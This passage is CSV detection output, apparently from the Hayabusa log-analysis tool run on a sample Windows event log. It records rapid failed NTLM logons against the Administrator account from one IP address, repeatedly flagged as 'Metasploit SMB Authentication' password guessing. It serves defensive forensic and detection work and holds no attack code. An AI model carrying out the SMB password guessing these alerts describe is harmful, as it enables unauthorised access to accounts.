Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 